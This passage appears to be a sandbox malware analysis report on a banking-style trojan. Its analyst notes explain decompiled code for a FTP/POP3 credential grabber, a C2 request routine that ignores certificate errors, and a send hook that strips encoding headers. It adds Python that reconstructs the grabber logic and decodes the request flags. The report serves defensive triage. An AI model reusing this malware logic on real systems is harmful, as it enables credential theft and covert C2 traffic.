    												if(_t94 != 0) {
    													goto L18;
    												} else {
    													E00416421(_t85);
    												}
    											}
    											_t73 = _v701;
    											L23:
    											LeaveCriticalSection(0x42311c);
    											_t35 = _t73;
    										}
    									}
    								}
    							}
    						} else {
    							goto L24;
    						}
    					}
    				}
    				L52:
    				return _t35;
    			}



































    [Disassembly listing for E00415CD2, addresses 0x00415cd2-0x00415f48: only the address column survived extraction; instruction text not available]

    APIs
    • EnterCriticalSection.KERNEL32(0042311C,0000FDE9,?), ref: 00415D87
    • LeaveCriticalSection.KERNEL32(0042311C,?,000000FF), ref: 00415DE2
    • EnterCriticalSection.KERNEL32(0042311C), ref: 00415DFD
    • getpeername.WS2_32 ref: 00415EAA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Enter$Leavegetpeername
    • String ID: $D$EAVU$OMDU$U$W$YIVR$YIVW$Z\DU$\[@S$]QUD
    • API String ID: 1099368488-2757721025
    • Opcode ID: bc9698637f868cacf6305389799c49b8fde871cd359eb66c6067c0a333cc5113
    • Instruction ID: 3e779d46858ab7630386f9c3506d5d6fd4c19a07baab98d9a46c60c182e299ce
    • Opcode Fuzzy Hash: bc9698637f868cacf6305389799c49b8fde871cd359eb66c6067c0a333cc5113
    • Instruction Fuzzy Hash: EF518631A04B01DADF309B65DC89BEB77A49BC1300F58852BF9949B291D72DDDC2878E
    Uniqueness

    Uniqueness Score: -1.00%
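
    Analyst note on E00415CD2 above: the function is the sample's credential grabber for USER/PASS style protocols. It XORs the first dword of each buffer it is handed (together with its socket handle, _a4) with 0x01050809 and compares the result against constants baked into the code, so the command names never appear as plaintext in the binary; the String ID listed above ("\[@S", "YIVR", "]QUD", "OMDU", "YIVW", "Z\DU", "EAVU") is those encoded constants. Decoded, 0x53405b5c and 0x52564959 are USER and PASS; 0x4455515d, 0x55444d4f and 0x57564959 are TYPE, FEAT and PASV, grouped with the plain-byte CWD/PWD checks under report tag 0x64; 0x55445c5a and 0x55564145 are STAT and LIST under tag 0x65. USER and PASS arguments are stored per socket under the critical section at 0x42311c, and the pair is reported (E00405851, after a getpeername lookup of the server address) only once a later command shows the server accepted the login. The Python below is an added analyst-side reconstruction of that decision logic, not code from the sample or from this report: it decodes the constants and replays the state machine over constructed traffic. The dict keyed on the socket stands in for the list helpers E00415BCA/E00415C03/E00415C69, the conversion with code page 0xFDE9 is assumed to be a UTF-8 decode, the getpeername lookup and the follow-up checks (E004198CB, E00417031) are left out, and reading tag 0x64 as FTP and 0x65 as POP3 is an inference from the two command sets, not something the report states.

```python
"""Analyst reconstruction of the USER/PASS grabber logic in E00415CD2.

Added example for this report, not code from the sample. The sample's list
helpers (E00415BCA / E00415C03 / E00415C69) are modelled by a dict keyed on
the socket handle; getpeername and the later checks are omitted.
"""
import struct
from typing import Dict, Optional, Tuple

# Every buffer's first dword is XORed with this key before comparison
# (decompiled: _t60 = *__ecx ^ 0x01050809), so the command text is never
# present in the binary as plaintext.
XOR_KEY = 0x01050809

# Encoded dword constants copied from the decompiled code.
CRED_COMMANDS = (0x53405b5c, 0x52564959)               # USER, PASS
TAG_A_COMMANDS = (0x4455515d, 0x55444d4f, 0x57564959)  # TYPE, FEAT, PASV -> 0x64
TAG_B_COMMANDS = (0x55445c5a, 0x55564145)              # STAT, LIST -> 0x65
TAG_A, TAG_B = 0x64, 0x65   # report tags; FTP vs POP3 reading is an assumption
MAX_LEN = 0x200             # buffers longer than this are ignored


def decode_const(dword: int) -> str:
    """Recover the 4-byte command text from an obfuscated constant."""
    return struct.pack("<I", dword ^ XOR_KEY).decode("ascii")


def encode_const(text: str) -> int:
    """Inverse of decode_const; useful when hunting for further constants."""
    return struct.unpack("<I", text.encode("ascii"))[0] ^ XOR_KEY


def _argument(data: bytes) -> Optional[str]:
    """Apply the sample's rules to the bytes after 'USER ' / 'PASS ': the value
    must be terminated by CR or LF inside the buffer, be non-empty and contain
    no other control characters, otherwise the whole message is dropped.
    The 0xFDE9 (CP_UTF8) conversion in the sample is assumed to be a UTF-8 decode."""
    arg = data[5:]
    for i, c in enumerate(arg):
        if c in (0x0D, 0x0A):
            return arg[:i].decode("utf-8", "replace") if i else None
        if c < 0x20:
            return None
    return None  # end of buffer reached without a terminator


class CredentialTracker:
    """Per-socket USER/PASS store that reports a pair only after a
    post-authentication command shows the server accepted it."""

    def __init__(self) -> None:
        self._sessions: Dict[int, Dict[str, str]] = {}

    def process(self, sock: int, data: bytes) -> Optional[Tuple[int, str, str]]:
        """Feed one client buffer; returns (tag, user, password) or None."""
        # _a4 == 0xffffffff, null pointer or __eax > 0x200 -> ignored
        if sock == -1 or not data or len(data) > MAX_LEN:
            return None
        # Stage 1 (len > 6): "USER x" / "PASS x" with a single space after the verb
        if len(data) > 6:
            head = struct.unpack("<I", data[:4])[0] ^ XOR_KEY
            if head in CRED_COMMANDS and data[4] == 0x20:
                arg = _argument(data)
                if arg is None:
                    return None
                sess = self._sessions.setdefault(sock, {})
                if data[0] == 0x55:       # 'U': a new USER resets the entry
                    sess.clear()
                    sess["user"] = arg
                else:
                    sess["pass"] = arg
                return None
        # Stage 2: everything else is tested as a post-authentication command
        return self._post_auth(sock, data)

    def _post_auth(self, sock: int, data: bytes) -> Optional[Tuple[int, str, str]]:
        if len(data) <= 1:
            return None
        tag = None
        if len(data) >= 3 and data[:3] in (b"CWD", b"PWD"):  # compared as plain bytes
            tag = TAG_A
        elif len(data) >= 4:
            head = struct.unpack("<I", data[:4])[0] ^ XOR_KEY
            if head in TAG_A_COMMANDS:
                tag = TAG_A
            elif head in TAG_B_COMMANDS:
                tag = TAG_B
        if tag is None:
            return None
        # The entry is discarded whether or not it is complete (E00415C69(entry, 0)),
        # so each login is reported at most once.
        sess = self._sessions.pop(sock, None)
        if not sess or "user" not in sess or "pass" not in sess:
            return None
        return tag, sess["user"], sess["pass"]


if __name__ == "__main__":
    # Constructed sample traffic: one FTP-style and one POP3-style session.
    tracker = CredentialTracker()
    for sock, msg in [(7, b"USER alice\r\n"), (7, b"PASS hunter2\r\n"), (7, b"TYPE I\r\n"),
                      (9, b"USER bob\r\n"), (9, b"PASS s3cret\r\n"), (9, b"STAT\r\n")]:
        hit = tracker.process(sock, msg)
        if hit:
            print("socket %d: tag 0x%x user=%r password=%r" % ((sock,) + hit))
```

    encode_const is the practical half for triage: feeding it other four-letter verbs (RETR, AUTH, QUIT) gives the dword to search for in the unpacked image, which is how the remaining grabber branches in a variant can be located without waiting for the constants to show up in a decompiled listing.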

    C-Code - Quality: 100%
    			E00410AA2(void _a4) {
    				long _v12;
    				void* _v16;
    				void* _v20;
    				char _v22;
    				short _v24;
    				char* _v32;
    				char* _v36;
    				intOrPtr _v40;
    				void* _v44;
    				char _v56;
    				char _v64;
    				char _v548;
    				char _v552;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t53;
    				void* _t56;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    				void* _t94;
    				void* _t97;
    				char* _t99;
    				intOrPtr* _t106;
    				void* _t109;
    				intOrPtr* _t110;
    				void* _t114;
    
    				_t106 = _a4;
    				if(E0041AE88( &_v36,  *((intOrPtr*)(_t106 + 4))) == 0) {
    					L25:
    					return 0;
    				}
    				_t53 = InternetOpenA( *0x422bb4, 0, 0, 0, 0);
    				_v44 = _t53;
    				if(_t53 == 0) {
    					L24:
    					E00416421(_v36);
    					E00416421(_v32);
    					goto L25;
    				}
    				_t56 = InternetConnectA(_t53, _v36, _v24, 0, 0, 3, 0, 0);
    				_v20 = _t56;
    				if(_t56 == 0) {
    					L23:
    					InternetCloseHandle(_v44);
    					goto L24;
    				}
    				_t58 =  *_t106;
    				_t99 = "POST";
    				if( *((char*)(_t58 + 0x18)) != 1) {
    					_t99 = "GET";
    				}
    				_t97 = HttpOpenRequestA(_v20, _t99, _v32, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v22 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
    				_v16 = _t97;
    				if(_t97 == 0) {
    					L22:
    					InternetCloseHandle(_v20);
    					goto L23;
    				} else {
    					E00406A66(_t99,  &_v552);
    					_t63 = 0xe;
    					E0041596E(_t63,  &_v64);
    					_t66 =  *_a4;
    					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
    						_t94 = E004171E5( &_v12,  &_v64,  *((intOrPtr*)(_t66 + 0x1c)));
    						_t114 = _t114 + 0xc;
    						if(_t94 > 0) {
    							HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
    							E00416421(_v12);
    						}
    					}
    					_t67 = 0xf;
    					E0041596E(_t67,  &_v56);
    					_v40 = E00416F70( &_v548);
    					_t109 = E004163F1(2 + _t69 * 6);
    					if(_t109 == 0) {
    						_t109 = 0;
    					} else {
    						E0041B1B3(_t109,  &_v548, _v40);
    						_t97 = _v16;
    					}
    					if(_t109 != 0 && E004171E5( &_v12,  &_v56, _t109) > 0) {
    						HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
    						E00416421(_v12);
    					}
    					E00416421(_t109);
    					_t110 = _a4;
    					if(HttpSendRequestA(_t97, 0, 0,  *( *_t110 + 0x24),  *( *_t110 + 0x28)) != 1) {
    						L21:
    						InternetCloseHandle(_t97);
    						goto L22;
    					} else {
    						_v12 = 4;
    						_a4 = 0;
    						if(HttpQueryInfoA(_t97, 0x20000013,  &_a4,  &_v12, 0) != 1 || _a4 != 0xc8) {
    							goto L21;
    						} else {
    							if(E00418557( &_v12, _t97) != 0) {
    								E00416421(_t80);
    							}
    							E00416421(_v36);
    							E00416421(_v32);
    							 *(_t110 + 8) = _v16;
    							goto L25;
    						}
    					}
    				}
    			}

    Instruction address column (one address per decompiled statement, 0x00000000 where the decompiler emitted a goto or label with no instruction of its own; its alignment with the C lines was lost in extraction): 80 entries, spanning 0x00410aae to 0x00410cb6.

    APIs
      • Part of subcall function 0041AE88: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041AEB7
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00410AD0
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00410AEE
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00410B39
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00410B8E
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00410C02
    • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00410C24
    • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00410C48
    • InternetCloseHandle.WININET(00000000), ref: 00410C88
    • InternetCloseHandle.WININET(?), ref: 00410C91
      • Part of subcall function 00418557: InternetQueryOptionA.WININET(00000000,00000022,00000000,000000C8), ref: 0041856B
      • Part of subcall function 00418557: GetLastError.KERNEL32 ref: 00418575
      • Part of subcall function 00418557: InternetQueryOptionA.WININET(00000022,00000022,00000000,000000C8), ref: 00418595
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    • InternetCloseHandle.WININET(?), ref: 00410C9A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
    • String ID: GET$HTTP/1.1$POST
    • API String ID: 1023423486-2753618334
    • Opcode ID: c3a44f2bd41abdf7957fd963af438e166376243de1ac0fb888dd73f4b4fe6709
    • Instruction ID: 56f4a7594f05062c74257cdb3d4c000736c1aad2af0673c4e16343e0d725322a
    • Opcode Fuzzy Hash: c3a44f2bd41abdf7957fd963af438e166376243de1ac0fb888dd73f4b4fe6709
    • Instruction Fuzzy Hash: AD51BE72900118BBCB11ABE1DD88EDFBF79EF48354F104526F505B6261DB789AC0CBA8
    Uniqueness

    Uniqueness Score: -1.00%
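
    What the listing for E00410AA2 shows, in security terms: the URL taken from the configuration is cracked with InternetCrackUrlA, the method is POST unless a config byte at offset 0x18 is set, and the request is opened with flags 0x8404f700, OR-ing in INTERNET_FLAG_SECURE only when the cracked scheme is https. The fixed flags bypass the cache, suppress UI and automatic authentication and, more importantly, ignore certificate name and date errors and HTTP/HTTPS redirect warnings, so a self-signed or expired certificate on the C2 host is accepted silently. The reply is kept only when HttpQueryInfoA with HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE (0x20000013) returns 200 (0xc8), and extra headers are attached with HTTP_ADDREQ_FLAG_ADD | HTTP_ADDREQ_FLAG_REPLACE (0xa0000000). The Python below is an added illustration, not code from the sample or from this report: it reproduces the obfuscated flag arithmetic and names the bits using the documented wininet.h values. Reading the local _v22 as URL_COMPONENTS.nScheme, filled in by the InternetCrackUrlA call inside the 0041AE88 helper, is an assumption.

```python
"""Decode the WinINet literals used by the C2 request routine E00410AA2.

Added illustration, not code from the sample or the sandbox report. Constant
values are the documented ones from wininet.h; treating _v22 as
URL_COMPONENTS.nScheme is an assumption.
"""

# dwFlags bits present in the literal 0x8404f700 passed to HttpOpenRequestA,
# plus the SECURE bit that the routine adds conditionally.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",                    # bypass the cache
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",            # do not cache the reply
    0x00800000: "INTERNET_FLAG_SECURE",                    # TLS
    0x00040000: "INTERNET_FLAG_NO_AUTH",                   # no automatic auth
    0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",  # expired cert accepted
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",    # name mismatch accepted
    0x00000400: "INTERNET_FLAG_HYPERLINK",
    0x00000200: "INTERNET_FLAG_NO_UI",                     # no auth/cert dialogs
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_SCHEME_HTTP = 1
INTERNET_SCHEME_HTTPS = 2
BASE_FLAGS = 0x8404F700          # literal from the HttpOpenRequestA call

# Other literals in the same function.
HTTP_QUERY_FLAG_NUMBER = 0x20000000
HTTP_QUERY_STATUS_CODE = 19      # 0x20000013 == FLAG_NUMBER | STATUS_CODE
HTTP_ADDREQ_FLAG_ADD = 0x20000000
HTTP_ADDREQ_FLAG_REPLACE = 0x80000000   # 0xa0000000 == ADD | REPLACE


def request_flags(scheme: int) -> int:
    """Reproduce `(0 | _v22 != 2) - 1 & 0x00800000 | 0x8404f700` in 32-bit
    arithmetic: subtracting 1 from the boolean yields 0 or 0xffffffff, so the
    SECURE bit survives the mask exactly when the scheme is https (2)."""
    not_https = 1 if scheme != INTERNET_SCHEME_HTTPS else 0
    secure_mask = ((not_https - 1) & 0xFFFFFFFF) & 0x00800000
    return secure_mask | BASE_FLAGS


def decode_flags(value: int) -> list:
    """Name every known bit in `value`; any bit we do not know is reported raw."""
    names = [name for bit, name in sorted(INTERNET_FLAGS.items()) if value & bit]
    leftover = value & ~sum(INTERNET_FLAGS)
    if leftover:
        names.append("UNKNOWN_0x%08x" % leftover)
    return names


def response_accepted(status_code: int) -> bool:
    """The routine keeps the request handle only when the numeric status
    queried via HttpQueryInfoA(..., 0x20000013, ...) equals 0xc8 (200)."""
    return status_code == 0xC8
```

Feed any HttpOpenRequest dwFlags literal from a decompilation into decode_flags; the IGNORE_CERT_* pair together with NO_UI is a practical triage signal for TLS-terminating C2 that uses throwaway certificates.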

    C-Code - Quality: 95%
    			E004085D0(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
    				struct tagRECT _v20;
    				signed int _v24;
    				signed int _v28;
    				signed short _t37;
    				int _t46;
    				BYTE* _t47;
    				signed short _t51;
    				int _t63;
    				int _t64;
    				unsigned int _t65;
    				struct HMENU__* _t70;
    				struct HMENU__* _t74;
    				void* _t78;
    
    				_t65 = __ecx;
    				_t37 = _a8;
    				_t78 = _t37 - 0xfffffffd;
    				if(_t78 == 0) {
    					SetKeyboardState( *0x422e20);
    					L23:
    					SetEvent( *0x422e1c);
    					return 0;
    				}
    				if(_t78 <= 0 || _t37 > 0xffffffff) {
    					_v20.top = _t37 >> 0x10;
    					_v20.right = _t65 & 0x0000ffff;
    					_v20.left = _t37 & 0x0000ffff;
    					_v20.bottom = _t65 >> 0x10;
    					E00408D10( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x422e10, _a4, 0);
    					goto L23;
    				} else {
    					_t70 = GetMenu(_a4);
    					if(_t70 == 0) {
    						goto L23;
    					}
    					_v24 = _v24 | 0xffffffff;
    					_t46 = GetMenuItemCount(_t70);
    					_t63 = 0;
    					_v28 = _t46;
    					if(_t46 <= 0) {
    						L8:
    						_t47 =  *0x422e20; // 0x0
    						_push(_t47[0x104]);
    						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
    						if(_t64 == 0xffffffff) {
    							goto L23;
    						}
    						_v28 = GetMenuState(_t70, _t64, 0x400);
    						if(_v24 != _t64) {
    							EndMenu();
    						}
    						HiliteMenuItem(_a4, _t70, _t64, 0x480);
    						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
    							if((_v28 & 0x00000010) == 0) {
    								if((_v28 & 0x00000800) == 0) {
    									_t51 = GetMenuItemID(_t70, _t64);
    									if(_t51 == 0xffffffff) {
    										goto L23;
    									}
    									L20:
    									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
    									goto L23;
    								}
    								_t51 = 0;
    								goto L20;
    							}
    							_t74 = GetSubMenu(_t70, _t64);
    							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
    								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
    							}
    						}
    						goto L23;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						if(GetMenuState(_t70, _t63, 0x400) < 0) {
    							HiliteMenuItem(_a4, _t70, _t63, 0x400);
    							_v24 = _t63;
    						}
    						_t63 = _t63 + 1;
    					} while (_t63 < _v28);
    					goto L8;
    				}
    			}

    Instruction address column (one address per decompiled statement, 0x00000000 where the decompiler emitted a goto or label with no instruction of its own; its alignment with the C lines was lost in extraction): 71 entries, spanning 0x004085d0 to 0x0040877b.

    APIs
    • GetMenu.USER32(?), ref: 004085FA
    • GetMenuItemCount.USER32 ref: 00408610
    • GetMenuState.USER32 ref: 00408628
    • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00408638
    • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040865E
    • GetMenuState.USER32 ref: 00408672
    • EndMenu.USER32 ref: 00408682
    • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 00408692
    • GetSubMenu.USER32 ref: 004086B6
    • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 004086D0
    • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 004086F1
    • GetMenuItemID.USER32(00000000,00000000), ref: 00408709
    • SendMessageW.USER32(?,00000111,?,00000000), ref: 00408722
    • SetKeyboardState.USER32 ref: 00408761
    • SetEvent.KERNEL32 ref: 0040876D
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
    • String ID:
    • API String ID: 751066993-0
    • Opcode ID: 707f75d54bbdf3340546d2ae6d4daf8c2f15fa1b4137511ece2da975adacd6fb
    • Instruction ID: ddeb767616201afbae5c4c784a57c97ce6aae36d9336bdc6a85f1ce15c58a412
    • Opcode Fuzzy Hash: 707f75d54bbdf3340546d2ae6d4daf8c2f15fa1b4137511ece2da975adacd6fb
    • Instruction Fuzzy Hash: A841AF30104305AFD715AF34DF48ABB3AA8EB847A8F14073DF995B21F0CB7589519B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A107() {
    				struct HINSTANCE__* _t2;
    				_Unknown_base(*)()* _t7;
    				void* _t9;
    
    				if( *0x423f44 != 0) {
    					L9:
    					 *0x423f44 =  *0x423f44 + 1;
    					return 1;
    				} else {
    					_t2 = LoadLibraryA("cabinet.dll");
    					 *0x423f40 = _t2;
    					if(_t2 == 0) {
    						L8:
    						return 0;
    					} else {
    						 *0x42356c = GetProcAddress(_t2, "FCICreate");
    						 *0x423f30 = GetProcAddress( *0x423f40, "FCIAddFile");
    						 *0x423164 = GetProcAddress( *0x423f40, "FCIFlushCabinet");
    						_t7 = GetProcAddress( *0x423f40, "FCIDestroy");
    						 *0x423f38 = _t7;
    						if( *0x42356c == 0 ||  *0x423f30 == 0 ||  *0x423164 == 0 || _t7 == 0) {
    							L7:
    							FreeLibrary( *0x423f40);
    							goto L8;
    						} else {
    							_t9 = HeapCreate(0, 0x80000, 0);
    							 *0x423160 = _t9;
    							if(_t9 != 0) {
    								goto L9;
    							} else {
    								goto L7;
    							}
    						}
    					}
    				}
    			}

    Instruction address column (one address per decompiled statement, 0x00000000 where the decompiler emitted a goto or label with no instruction of its own; its alignment with the C lines was lost in extraction): 31 entries, spanning 0x0041a110 to 0x0041a1c4.

    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041A1EE,?,0041A40A,?,?,00000000,?), ref: 0041A11B
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0041A13B
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 0041A14D
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0041A15F
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 0041A171
    • HeapCreate.KERNEL32(00000000,00080000,00000000,0041A40A,?,?,00000000,?), ref: 0041A19C
    • FreeLibrary.KERNEL32(0041A40A,?,?,00000000,?), ref: 0041A1B1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: facbaf7b395050960ac34012fb333e202eaed65f27b7e705bc215cd285f42f6e
    • Instruction ID: be1545600d9a8d341680e3daedeb59b4756e1285aa2b27f332d277b0d9637646
    • Opcode Fuzzy Hash: facbaf7b395050960ac34012fb333e202eaed65f27b7e705bc215cd285f42f6e
    • Instruction Fuzzy Hash: E1118270F01240AAC7319F64BE44A5ABFB0B7C8B023550577E604A2274D73C4592CE0D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0040D33C(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
    				intOrPtr _v20;
    				void* _v24;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				void* _v44;
    				void* _v60;
    				signed int _v72;
    				char _v76;
    				signed int _v80;
    				signed int _v84;
    				signed char _v88;
    				signed int _v92;
    				void* _v96;
    				intOrPtr _v104;
    				signed int _v108;
    				void* _v112;
    				void* _v132;
    				void* __esi;
    				signed int _t111;
    				signed int _t113;
    				signed char _t114;
    				signed int _t115;
    				void* _t117;
    				signed char _t121;
    				signed int _t122;
    				signed int _t125;
    				signed int _t128;
    				signed char _t130;
    				signed char _t136;
    				intOrPtr _t149;
    				void* _t165;
    				signed char _t166;
    				void* _t172;
    				intOrPtr _t178;
    				signed int _t184;
    				void* _t186;
    				void* _t188;
    				signed int _t202;
    				signed int _t203;
    				signed int _t205;
    				void* _t207;
    
    				_t207 = (_t205 & 0xfffffff8) - 0x5c;
    				if(E004068C0() == 0 || _a8 == 0 || _a12 <= 0) {
    					L9:
    					_t111 =  *0x422f9c(_a4, _a8, _a12);
    					goto L10;
    				} else {
    					EnterCriticalSection(0x422fac);
    					_t192 = _a4;
    					_t184 = E0040C3C0(_a4);
    					_v84 = _t184;
    					if(_t184 == 0xffffffff) {
    						L8:
    						LeaveCriticalSection(0x422fac);
    						goto L9;
    					}
    					_t186 = _t184 * 0x38 +  *0x422fc8;
    					if( *(_t186 + 0x20) > 0) {
    						L29:
    						_t113 =  *(_t186 + 0x24);
    						_t188 =  *(_t186 + 0x20) - _t113;
    						LeaveCriticalSection(0x422fac);
    						_t195 = _a4;
    						_t114 =  *0x422f9c(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
    						_v88 = _t114;
    						__eflags = _t114 - 0xffffffff;
    						if(_t114 != 0xffffffff) {
    							EnterCriticalSection(0x422fac);
    							_t115 = E0040C3C0(_t195);
    							__eflags = _t115 - 0xffffffff;
    							if(_t115 != 0xffffffff) {
    								_t166 = _v88;
    								_t117 = _t115 * 0x38 +  *0x422fc8;
    								__eflags = _t166 - _t188;
    								if(_t166 != _t188) {
    									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
    									_t92 = _t117 + 0x28;
    									 *_t92 =  *(_t117 + 0x28) - 1;
    									__eflags =  *_t92;
    									_v88 = 1;
    								} else {
    									_t88 = _t117 + 0x1c; // -4337580
    									_v88 =  *(_t117 + 0x28);
    									E004164D4(E00416421( *_t88), _t88, 0, 0x10);
    								}
    							} else {
    								_v88 = _v88 | _t115;
    								 *0x422fa8(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x422fac);
    						}
    						L36:
    						_t111 = _v88;
    						L10:
    						return _t111;
    					}
    					if( *(_t186 + 8) > 0) {
    						L38:
    						LeaveCriticalSection(0x422fac);
    						_t197 = _a4;
    						_t121 =  *0x422f9c(_a4, _a8, _a12);
    						_v88 = _t121;
    						__eflags = _t121 - 0xffffffff;
    						if(_t121 != 0xffffffff) {
    							EnterCriticalSection(0x422fac);
    							_t122 = E0040C3C0(_t197);
    							__eflags = _t122 - 0xffffffff;
    							if(_t122 != 0xffffffff) {
    								_t172 = _t122 * 0x38 +  *0x422fc8;
    								_t178 =  *((intOrPtr*)(_t172 + 8));
    								__eflags = _v88 - _t178;
    								if(_v88 > _t178) {
    									E0040C47E(_t122);
    								} else {
    									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
    								}
    							} else {
    								_v88 = _v88 | _t122;
    								 *0x422fa8(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x422fac);
    						}
    						goto L36;
    					}
    					_t125 = E0040C8B4( &_v76, _t192, _a8, _a12);
    					_v92 = _t125;
    					if(_t125 != 0xffffffff) {
    						__eflags = _v72;
    						if(_v72 == 0) {
    							L37:
    							E00410A15( &_v76);
    							_t128 = _v80 + _a12;
    							__eflags = _t128;
    							 *(_t186 + 8) = _t128;
    							goto L38;
    						}
    						_t130 = E004100E7( &_v76);
    						_v88 = _t130;
    						__eflags = _t130 & 0x00000001;
    						if((_t130 & 0x00000001) == 0) {
    							_v92 = 0;
    							_v88 = 0;
    							__eflags = _t130 & 0x00000002;
    							if(__eflags != 0) {
    								_t203 = E00416474(__eflags, _a8, _a12);
    								 *(_t207 + 0x10) = _t203;
    								__eflags = _t203;
    								if(_t203 != 0) {
    									E00410A7F( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
    									E00416421( *(_t186 + 0x14));
    									E00416421( *((intOrPtr*)(_t186 + 4)));
    									_t149 = E0041687F(_v76, _v80);
    									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
    									_t38 = _t186 + 0x18;
    									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
    									__eflags =  *_t38;
    									 *((intOrPtr*)(_t186 + 4)) = _t149;
    									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
    									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
    									 *((intOrPtr*)(_t207 + 0x14)) = E0041B351(E0041B351(E0041B3CD(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
    								} else {
    									E00410A7F( *((intOrPtr*)(_t207 + 0x60)), _v20);
    								}
    							}
    							__eflags = _v84 & 0x00000004;
    							if((_v84 & 0x00000004) == 0) {
    								L27:
    								__eflags = _v92;
    								if(_v92 == 0) {
    									goto L37;
    								}
    								E00410A15( &_v76);
    								_t70 = _t186 + 0x24;
    								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
    								__eflags =  *_t70;
    								 *(_t186 + 8) = _v80;
    								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
